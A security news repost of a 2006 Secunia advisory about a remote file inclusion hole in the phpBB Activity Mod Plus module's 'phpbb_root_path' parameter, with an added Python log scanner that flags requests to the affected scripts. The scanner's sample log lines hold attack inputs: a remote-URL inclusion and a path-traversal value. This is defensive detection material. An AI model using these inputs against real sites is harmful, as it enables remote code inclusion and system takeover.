Ravens PHP Scripts

phpBB Activity Mod Plus Module phpbb_root_path File Inclusion
Date: Wednesday, May 31, 2006 @ 07:24:11 CDT
Topic: Security


TITLE: phpBB Activity Mod Plus Module "phpbb_root_path" File Inclusion

SECUNIA ADVISORY ID: SA20354

VERIFY ADVISORY: http://secunia.com/advisories/20354/

CRITICAL: Highly critical

IMPACT: System access

WHERE: From remote

SOFTWARE: Activity Mod Plus 1.x (module for phpBB)
http://secunia.com/product/10213/

DESCRIPTION: Mustafa Can Bjorn has reported a vulnerability in the Activity Mod Plus module for phpBB, which can be exploited by malicious people to compromise a vulnerable system.

Input passed to the "phpbb_root_path" parameter in "language/lang_english/lang_activity.php" is not properly verified before it is used to include files. This can be exploited to include arbitrary files from external and local resources.

The "lang_activity_char.php" script is reportedly also affected.

Successful exploitation requires that "register_globals" is enabled.

SOLUTION: Apply code changes as instructed by the vendor. http://www.phpbb-amod.com/topics.html-t-2423

PROVIDED AND/OR DISCOVERED BY: Mustafa Can Bjorn

ORIGINAL ADVISORY: http://www.nukedx.com/?viewdoc=38
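
An added example, not part of the Secunia advisory or the vendor's fix: a Python check that scans web-server access logs for requests supplying the reported parameter to the two scripts named above. It assumes Apache combined-format log lines and that legitimate traffic never passes "phpbb_root_path" in a URL; the sample entries, the /phpBB2/ prefix and the host name are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

AFFECTED = {"lang_activity.php", "lang_activity_char.php"}  # scripts named in the advisory
PARAM = "phpbb_root_path"                                   # parameter named in the advisory

REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')      # request line of a log entry
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.\-]*://", re.I)     # value is a URL-style resource

def classify(line):
    """Return a verdict if the request sets PARAM on an affected script, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if unquote(url.path).rsplit("/", 1)[-1] not in AFFECTED:
        return None
    # parse_qs percent-decodes values, so encoded separators are seen in clear.
    values = parse_qs(url.query, keep_blank_values=True).get(PARAM)
    if values is None:
        return None
    if any(SCHEME_RE.match(v) for v in values):
        return "external-resource"
    if any(v.startswith("/") or ".." in v for v in values):
        return "local-path"
    return "parameter-set"

def scan(lines):
    """Return (line_number, verdict) for every flagged log line."""
    return [(n, v) for n, line in enumerate(lines, 1) if (v := classify(line))]

# Constructed sample entries (documentation addresses, placeholder host and paths).
SAMPLE_LOG = [
    '203.0.113.5 - - [31/May/2006:07:24:11 -0500] "GET /phpBB2/language/lang_english/'
    'lang_activity.php?phpbb_root_path=http://host.invalid/ HTTP/1.1" 200 512',
    '203.0.113.5 - - [31/May/2006:07:24:15 -0500] "GET /phpBB2/language/lang_english/'
    'lang_activity_char.php?phpbb_root_path=..%2F..%2F HTTP/1.1" 200 128',
    '198.51.100.7 - - [31/May/2006:07:25:02 -0500] "GET /phpBB2/language/lang_english/'
    'lang_activity.php HTTP/1.1" 200 0',
    '198.51.100.7 - - [31/May/2006:07:25:09 -0500] "GET /phpBB2/viewtopic.php?t=5 '
    'HTTP/1.1" 200 9000',
]

if __name__ == "__main__":
    for n, verdict in scan(SAMPLE_LOG):
        print(f"line {n}: {verdict}")
```

With "register_globals" enabled the same variable can also be populated from POST data or a cookie, which a default access log does not record, so an empty result does not show that a vulnerable installation was never targeted.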

This article comes from Ravens PHP Scripts
https://www.ravenphpscripts.com

The URL for this story is:
https://www.ravenphpscripts.com/modules.php?name=News&file=article&sid=2197